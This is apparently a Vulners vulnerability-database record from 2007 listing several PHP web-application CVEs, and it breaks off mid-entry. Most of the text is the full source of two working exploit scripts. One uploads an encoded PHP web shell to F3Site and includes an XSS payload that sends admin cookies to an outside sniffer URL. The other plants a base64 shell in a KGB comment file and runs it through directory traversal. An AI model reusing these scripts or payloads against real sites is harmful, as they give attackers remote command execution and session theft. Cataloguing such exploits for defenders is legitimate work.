ID SECURITYVULNS:VULN:7161
Type securityvulns
Reporter
Modified 2007-02-03T00:00:00
Description
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
{"id": "SECURITYVULNS:VULN:7161", "bulletinFamily": "software", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2007-02-03T00:00:00", "modified": "2007-02-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7161", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:15959", "https://vulners.com/securityvulns/securityvulns:doc:15956", "https://vulners.com/securityvulns/securityvulns:doc:15958", "https://vulners.com/securityvulns/securityvulns:doc:15960", "https://vulners.com/securityvulns/securityvulns:doc:15957"], "cvelist": ["CVE-2007-0757", "CVE-2007-0337", "CVE-2007-0761", "CVE-2007-0762", "CVE-2007-0765", "CVE-2007-0764", "CVE-2007-0763", "CVE-2007-0760"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:23", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "861c67ecde08e081197650228c6d9064"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "26695ff0769e94ae116ba5fa27195342"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "c61e5d59aa5c4e535b518cca44e00a6f"}, {"key": "href", "hash": "4e26a79911e92d8813b50900bf1dc9a0"}, {"key": "modified", "hash": "d5a775a2d117be130f3f047aa820137a"}, {"key": "published", "hash": "d5a775a2d117be130f3f047aa820137a"}, {"key": "references", "hash": "61c95561cdc4f4824bcffb376eca6fd2"}, {"key": "reporter", "hash": "7215ee9c7d9dc229d2921a40e899ec5f"}, {"key": "title", "hash": "c71de4d0becfd832639c1439702d0d67"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "7481178f69899f222c6ae09d4c2cd00eb134ff2b1953ac097da3711777fe5fb1", "viewCount": 9, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2018-08-31T11:09:23"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0761", "CVE-2007-0764", "CVE-2007-0337", "CVE-2007-0757", "CVE-2007-0760", "CVE-2007-0763", "CVE-2007-0765", "CVE-2007-0762"]}, {"type": "exploitdb", "idList": ["EDB-ID:3255", "EDB-ID:3134", "EDB-ID:3252", "EDB-ID:3258", "EDB-ID:3256", "EDB-ID:3251", "EDB-ID:3259"]}, {"type": "osvdb", "idList": ["OSVDB:31585", "OSVDB:33645", "OSVDB:33112", "OSVDB:33111", "OSVDB:34668", "OSVDB:33095", "OSVDB:34669", "OSVDB:33092"]}], "modified": "2018-08-31T11:09:23"}, "vulnersScore": 4.5}, "objectVersion": "1.3", "affectedSoftware": [{"name": "KGB", "operator": "eq", "version": "1.9"}, {"name": "Flipper Poll", "operator": "eq", "version": "1.1"}, {"name": "phpBB ezBoard converter", "operator": "eq", "version": "0.2"}, {"name": "eqDKP", "operator": "eq", "version": "1.3"}, {"name": "Photo Galerie Standard", "operator": "eq", "version": "1.1"}, {"name": "F3Site", "operator": "eq", "version": "2.1"}]}
{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in config.php in phpBB ezBoard converter (ezconvert) 0.2 allows remote attackers to execute arbitrary PHP code via a URL in the ezconvert_dir parameter.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0761", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0761", "published": "2007-02-06T02:28:00", "title": "CVE-2007-0761", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Unrestricted file upload vulnerability in F3Site 2.1 and earlier allows remote authenticated administrators to upload and execute arbitrary PHP scripts via GIF86 header in a file in the uplf parameter, which can be later accessed via a relative pathname in the dir parameter in adm.php.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0764", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0764", "published": "2007-02-06T02:28:00", "title": "CVE-2007-0764", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in sesskglogadmin.php in KGB 1.9 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the skinnn parameter, as demonstrated by invoking kg.php with a postek parameter containing PHP code, which is injected into a file in the kg directory, and then included by sesskglogadmin.php.", "modified": "2017-10-19T01:29:00", "id": "CVE-2007-0337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0337", "published": "2007-01-18T02:28:00", "title": "CVE-2007-0337", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "EQdkp 1.3.1 and earlier authenticates administrative requests by verifying that the HTTP Referer header specifies an admin/ URL, which allows remote attackers to read or modify account names and passwords via a spoofed Referer.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0760", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0760", "published": "2007-02-06T02:28:00", "title": "CVE-2007-0760", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in index.php in Miguel Nunes Call of Duty 2 (CoD2) DreamStats System 4.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0757", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0757", "published": "2007-02-06T02:28:00", "title": "CVE-2007-0757", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in the news comment functionality in F3Site 2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the Autor field.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0763", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0763", "published": "2007-02-06T02:28:00", "title": "CVE-2007-0763", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in news.php in dB Masters Curium CMS 1.03 and earlier allows remote attackers to execute arbitrary SQL commands via the c_id parameter.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0765", "published": "2007-02-06T02:28:00", "title": "CVE-2007-0765", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in includes/functions.php in phpBB++ Build 100 allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0762", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0762", "published": "2007-02-06T02:28:00", "title": "CVE-2007-0762", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T18:04:10", "bulletinFamily": "exploit", "description": "F3Site <= 2.1 Remote Code Execution Exploit. CVE-2007-0763,CVE-2007-0764. Webapps exploit for php platform", "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "EDB-ID:3255", "href": "https://www.exploit-db.com/exploits/3255/", "type": "exploitdb", "title": "F3Site <= 2.1 - Remote Code Execution Exploit", "sourceData": "<?\n//**************************************************************\n//Kacper & str0ke Settings \n$exploit_name = \"F3Site <= 2.1 Remote Code Execution Exploit\";\n$script_name = \"F3Site 2.1\";\n$script_site = \"http://dhost.info/compmaster/\";\n$dork = '\"Powered by F3Site\"';\n//to work exploit you need admin session, and cookies prefix\n//**************************************************************\nprint '\n::::::::: :::::::::: ::: ::: ::::::::::: ::: \n:+: :+: :+: :+: :+: :+: :+: \n+:+ +:+ +:+ +:+ +:+ +:+ +:+ \n+#+ +:+ +#++:++# +#+ +:+ +#+ +#+ \n+#+ +#+ +#+ +#+ +#+ +#+ +#+ \n#+# #+# #+# #+#+#+# #+# #+# \n######### ########## ### ########### ########## \n::::::::::: :::::::::: ::: :::: :::: \n :+: :+: :+: :+: +:+:+: :+:+:+ \n +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ \n +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ \n +#+ +#+ +#+ +#+ +#+ +#+ \n #+# #+# #+# #+# #+# #+# \n ### ########## ### ### ### ### \n\t\n - - [DEVIL TEAM THE BEST POLISH TEAM] - -\n \n\n[Exploit name: '.$exploit_name.'\n[Script name: '.$script_name.'\n[Script site: '.$script_site.'\ndork: '.$dork.'\n\nFind by: Kacper (a.k.a Rahim)\nBlog: http://kacper.bblog.pl/\n\nDEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\nDEVIL TEAM HOME: http://www.rahim.webd.pl/\n\nContact: kacper1964@yahoo.pl\n\n(c)od3d by Kacper\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\nGreetings DragonHeart and all DEVIL TEAM Patriots :)\n- Leito & Leon | friend str0ke ;)\n\npepi, D0han, d3m0n, D3m0n (ziom z Niemiec :P)\ndn0de, DUREK5, fdj, konsol, mass, michalind, mIvus, nukedclx, QunZ,\nRebeL, SkD, Adam, drzewko, Leito, LEON, TomZen, dub1osu, ghost, WRB\n\n and\n \nDr Max Virus\nTamTurk,\nhackersecurity.org\nand all exploit publishers\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n Greetings for 4ll Fusi0n Group members ;-)\n and all members of hacker.com.pl ;)\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n Kacper Hacking & Security Blog: http://kacper.bblog.pl/\n';\n/*\nTo use exploit, you need admin session, and cookies prefix. You can steal it!\n\ngo to:\nhttp://www.strona.pl/F3Site_path/?co=news&id={news id}\n\nand when you comment the news in field: \"Autor\" you can insert XSS\n\nAutor: \"><script>alert('http://www.stronazesnifferem.gov.pl/sniff/cookies.php?c='+document.cookie);</script>\n\ngood luck :)\n\nKacper\n*/\nif ($argc<6) {\nprint_r('\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\nUsage: php '.$argv[0].' host path admin_session prefix_cookies cmd OPTIONS\nhost: target server (ip/hostname)\npath: F3Site path\nadmin_session: admin session id\nprefix_cookies: cookies prefix (default: ZMIEN_TO)\ncmd: a shell command (ls -la)\nOptions:\n -p[port]: specify a port other than 80\n -P[ip:port]: specify a proxy\nExample:\nphp '.$argv[0].' 2.2.2.2 /F3Site/ 20333716fc24dc5939a1e9302c89f72e ZMIEN_TO ls -la -P1.1.1.1:80\nphp '.$argv[0].' 2.2.2.2 /F3Site/ 20333716fc24dc5939a1e9302c89f72e ZMIEN_TO ls -la\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n');\ndie;\n}\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacket($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n}\nfunction make_seed()\n{\n list($usec, $sec) = explode(' ', microtime());\n return (float) $sec + ((float) $usec * 100000);\n}\n$host=$argv[1];\n$path=$argv[2];\n$adsess=$argv[3];\n$prefixcookie=$argv[4];\n$cmd=\"\";\n$port=80;\n$proxy=\"\";\nfor ($i=5; $i<$argc; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>\"-p\") and ($temp<>\"-P\")) {$cmd.=\" \".$argv[$i];}\nif ($temp==\"-p\")\n{\n $port=str_replace(\"-p\",\"\",$argv[$i]);\n}\nif ($temp==\"-P\")\n{\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\n}\n}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\n$hauru=\n\"\\x20\\x0d\\x0a\\x47\\x49\\x46\\x38\\x36\\x0d\\x0a\\x3c\\x3f\\x70\\x68\\x70\\x20\".\n\"\\x6f\\x62\\x5f\\x63\\x6c\\x65\\x61\\x6e\\x28\\x29\\x3b\\x0d\\x0a\\x2f\\x2f\\x52\".\n\"\\x75\\x63\\x68\\x6f\\x6d\\x79\\x20\\x7a\\x61\\x6d\\x65\\x6b\\x20\\x48\\x61\\x75\".\n\"\\x72\\x75\\x20\\x3b\\x2d\\x29\\x0d\\x0a\\x65\\x63\\x68\\x6f\\x22\\x2e\\x2e\\x2e\".\n\"\\x48\\x61\\x63\\x6b\\x65\\x72\\x2e\\x2e\\x4b\\x61\\x63\\x70\\x65\\x72\\x2e\\x2e\".\n\"\\x4d\\x61\\x64\\x65\\x2e\\x2e\\x69\\x6e\\x2e\\x2e\\x50\\x6f\\x6c\\x61\\x6e\\x64\".\n\"\\x21\\x21\\x2e\\x2e\\x2e\\x44\\x45\\x56\\x49\\x4c\\x2e\\x54\\x45\\x41\\x4d\\x2e\".\n\"\\x2e\\x74\\x68\\x65\\x2e\\x2e\\x62\\x65\\x73\\x74\\x2e\\x2e\\x70\\x6f\\x6c\\x69\".\n\"\\x73\\x68\\x2e\\x2e\\x74\\x65\\x61\\x6d\\x2e\\x2e\\x47\\x72\\x65\\x65\\x74\\x7a\".\n\"\\x2e\\x2e\\x2e\\x22\\x3b\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x65\\x63\\x68\".\n\"\\x6f\\x22\\x2e\\x2e\\x2e\\x47\\x6f\\x20\\x54\\x6f\\x20\\x44\\x45\\x56\\x49\\x4c\".\n\"\\x20\\x54\\x45\\x41\\x4d\\x20\\x49\\x52\\x43\\x3a\\x20\\x37\\x32\\x2e\\x32\\x30\".\n\"\\x2e\\x31\\x38\\x2e\\x36\\x3a\\x36\\x36\\x36\\x37\\x20\\x23\\x64\\x65\\x76\\x69\".\n\"\\x6c\\x74\\x65\\x61\\x6d\\x22\\x3b\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x65\".\n\"\\x63\\x68\\x6f\\x22\\x2e\\x2e\\x2e\\x44\\x45\\x56\\x49\\x4c\\x20\\x54\\x45\\x41\".\n\"\\x4d\\x20\\x53\\x49\\x54\\x45\\x3a\\x20\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\".\n\"\\x77\\x77\\x2e\\x72\\x61\\x68\\x69\\x6d\\x2e\\x77\\x65\\x62\\x64\\x2e\\x70\\x6c\".\n\"\\x2f\\x22\\x3b\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x69\\x6e\\x69\\x5f\\x73\".\n\"\\x65\\x74\\x28\\x22\\x6d\\x61\\x78\\x5f\\x65\\x78\\x65\\x63\\x75\\x74\\x69\\x6f\".\n\"\\x6e\\x5f\\x74\\x69\\x6d\\x65\\x22\\x2c\\x30\\x29\\x3b\\x0d\\x0a\\x20\\x0d\\x0a\".\n\"\\x20\\x0d\\x0a\\x65\\x63\\x68\\x6f\\x20\\x22\\x48\\x61\\x75\\x72\\x75\\x22\\x3b\".\n\"\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x70\\x61\\x73\\x73\\x74\\x68\\x72\\x75\".\n\"\\x28\\x24\\x5f\\x53\\x45\\x52\\x56\\x45\\x52\\x5b\\x48\\x54\\x54\\x50\\x5f\\x48\".\n\"\\x41\\x55\\x52\\x55\\x5d\\x29\\x3b\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x64\".\n\"\\x69\\x65\\x3b\\x3f\\x3e\\x0d\\x0a\\x20\";\n\n$data.='-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"uplf\"; filename=\"hauru.php\"\nContent-Type: text/plain\n\n'.$hauru.'\n-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"submit\"\n\nOK\n-----------------------------7d6224c08dc--\n';\n\necho \"upload Hauru!! ...\\n\";\n$packet =\"POST \".$p.\"adm.php?x=fm&act=up&dir=./files/&ff=xu_f HTTP/1.0\\r\\n\";\n$packet.=\"Cookie: \".$prefixcookie.\"=\".$adsess.\";\\r\\n\";\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacket($packet);\nsleep(1);\n\necho \"Hauru uploaded!! now remote code execution...\\n\";\n$packet =\"GET \".$p.\"files/hauru.php HTTP/1.1\\r\\n\";\n$packet.=\"HAURU: \".$cmd.\"\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacket($packet);\nif (strstr($html,\"Hauru\"))\n{\n$temp=explode(\"Hauru\",$html);\ndie($temp[1]);\n}\n?>\n\n# milw0rm.com [2007-02-02]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3255/"}, {"lastseen": "2016-01-31T17:48:50", "bulletinFamily": "exploit", "description": "KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit. CVE-2007-0337. Webapps exploit for php platform", "modified": "2007-01-15T00:00:00", "published": "2007-01-15T00:00:00", "id": "EDB-ID:3134", "href": "https://www.exploit-db.com/exploits/3134/", "type": "exploitdb", "title": "KGB <= 1.9 sesskglogadmin.php Local File Include Exploit", "sourceData": "<?\n\n//Kacper & str0ke Settings \n$exploit_name = \"KGB <= 1.9 Remote Code Execution Exploit\";\n$script_name = \"KGB 1.9\";\n$script_site = \"http://www.kgb.xs.com.pl/index.php?tri=2\";\n$dork = 'inurl:\"kgb19\"';\n//**************************************************************\n\n\nprint '\n::::::::: :::::::::: ::: ::: ::::::::::: ::: \n:+: :+: :+: :+: :+: :+: :+: \n+:+ +:+ +:+ +:+ +:+ +:+ +:+ \n+#+ +:+ +#++:++# +#+ +:+ +#+ +#+ \n+#+ +#+ +#+ +#+ +#+ +#+ +#+ \n#+# #+# #+# #+#+#+# #+# #+# \n######### ########## ### ########### ########## \n::::::::::: :::::::::: ::: :::: :::: \n :+: :+: :+: :+: +:+:+: :+:+:+ \n +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ \n +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ \n +#+ +#+ +#+ +#+ +#+ +#+ \n #+# #+# #+# #+# #+# #+# \n ### ########## ### ### ### ### \n\t\n - - [DEVIL TEAM THE BEST POLISH TEAM] - -\n \n\n[Exploit name: '.$exploit_name.'\n[Script name: '.$script_name.'\n[Script site: '.$script_site.'\ndork: '.$dork.'\n\nFind by: Kacper (a.k.a Rahim)\nBlog: http://kacper.bblog.pl/\n\nDEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\nDEVIL TEAM HOME: http://www.rahim.webd.pl/\n\nContact: kacper1964@yahoo.pl\n\n(c)od3d by Kacper\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\nGreetings DragonHeart and all DEVIL TEAM Patriots :)\n- Leito & Leon | friend str0ke ;)\n\npepi, D0han, d3m0n, D3m0n (ziom z Niemiec :P)\ndn0de, DUREK5, fdj, konsol, mass, michalind, mIvus, nukedclx, QunZ,\nRebeL, SkD, Adam, drzewko, Leito, LEON, TomZen, dub1osu, ghost, WRB\n\n and\n \nDr Max Virus\nTamTurk,\nhackersecurity.org\nand all exploit publishers\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n Greetings for 4ll Fusi0n Group members ;-)\n and all members of hacker.com.pl ;)\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n Kacper Hacking & Security Blog: http://kacper.bblog.pl/\n Polish Hacking Portal: http://iHACK.pl\n';\n\n\n/*\nSolution:\nYou only add evil code to comment, and run it: \n\nkgbmod/sesskglogadmin.php?sesloga=1&skinnn=../../kg/wpisy.txt%00\n\nVery Easy :)\n\nGreetz @ll\n\nHacking & Security Blog - http://kacper.bblog.pl/\n\n*/\n\n\nif ($argc<4) {\nprint_r('\n-----------------------------------------------------------------------------\nUsage: php '.$argv[0].' host path cmd OPTIONS\nhost: target server (ip/hostname)\npath: kgb19 Forum path\ncmd: a shell command (ls -la)\nOptions:\n -p[port]: specify a port other than 80\n -P[ip:port]: specify a proxy\nExample:\nphp '.$argv[0].' 2.2.2.2 /kgb19/ ls -la -P1.1.1.1:80\nphp '.$argv[0].' 2.2.2.2 /kgb19/ ls -la\n-----------------------------------------------------------------------------\n');\n\ndie;\n}\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacket($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n}\nfunction make_seed()\n{\n list($usec, $sec) = explode(' ', microtime());\n return (float) $sec + ((float) $usec * 100000);\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$cmd=\"\";\n\n$port=80;\n$proxy=\"\";\nfor ($i=3; $i<$argc; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>\"-p\") and ($temp<>\"-P\")) {$cmd.=\" \".$argv[$i];}\nif ($temp==\"-p\")\n{\n $port=str_replace(\"-p\",\"\",$argv[$i]);\n}\nif ($temp==\"-P\")\n{\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\n}\n}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\necho \"Connected...\\n\";\n$calcifer = base64_decode(\"Ijs/Pjw/cGhwIG9iX2NsZWFuKCk7Ly9SdWNob215IHphbWVrIEhhdXJ1IDs\".\n\"tKWVjaG8iLi4uSGFja2VyLi5LYWNwZXIuLk1hZGUuLmluLi5Qb2xhbmQhIS\".\n\"4uLkRFVklMLlRFQU0uLnRoZS4uYmVzdC4ucG9saXNoLi50ZWFtLi5HcmVld\".\n\"HouLi4iO2VjaG8iLi4uR28gVG8gREVWSUwgVEVBTSBJUkM6IGlyYy5taWx3\".\n\"MHJtLmNvbTo2NjY3ICNkZXZpbHRlYW0iO2VjaG8iLi4uREVWSUwgVEVBTSB\".\n\"TSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvIjtpbmlfc2V0KCJtYX\".\n\"hfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYXNzdGhydSgkX\".\n\"1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+PD9waHAgZWNobyBLYWNwZXIg\".\n\"SGFjayA6UCINCg0KDQo=\");\n\n$data.='-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"nicek\"\n\nHauru\n-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"postek\"\n\n'.$calcifer.'\n-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"submit\"\n\nmachnij wpis\n-----------------------------7d6224c08dc--\n';\n\n\necho \"wait now insert evil comment...\\n\";\n$packet =\"POST \".$p.\"kg.php HTTP/1.0\\r\\n\";\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacket($packet);\nsleep(1);\n\n\necho \"now remote code execution...\\n\";\n$packet =\"GET \".$p.\"kgbmod/sesskglogadmin.php?sesloga=1&skinnn=../../kg/wpisy.txt%00 HTTP/1.0\\r\\n\";\n$packet.=\"HAURU: \".$cmd.\"\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacket($packet);\nsleep(1);\nif (strstr($html,\"Hauru\"))\n{\n$temp=explode(\"Hauru\",$html);\ndie($temp[1]);\n}\n\necho \"Exploit err0r :(\\n\";\necho \"Check register_globals = On and magic_quotes_gpc = off\\n\";\necho \"Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\\r\\n\";\n?>\n\n# milw0rm.com [2007-01-15]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3134/"}, {"lastseen": "2016-01-31T18:03:42", "bulletinFamily": "exploit", "description": "EQdkp <= 1.3.1 (Referer Spoof) Remote Database Backup Vulnerability. CVE-2007-0760. Webapps exploit for php platform", "modified": "2007-02-02T00:00:00", "published": "2007-02-02T00:00:00", "id": "EDB-ID:3252", "href": "https://www.exploit-db.com/exploits/3252/", "type": "exploitdb", "title": "EQdkp <= 1.3.1 Referer Spoof Remote Database Backup Vulnerability", "sourceData": "Title: EQdkp <= 1.3.1 Referer Spoof to access to SQL Database\nURL: http://www.eqdkp.com\nHook: \"Powered by EQdkp\"\nAuthor: Eight10\nContact: 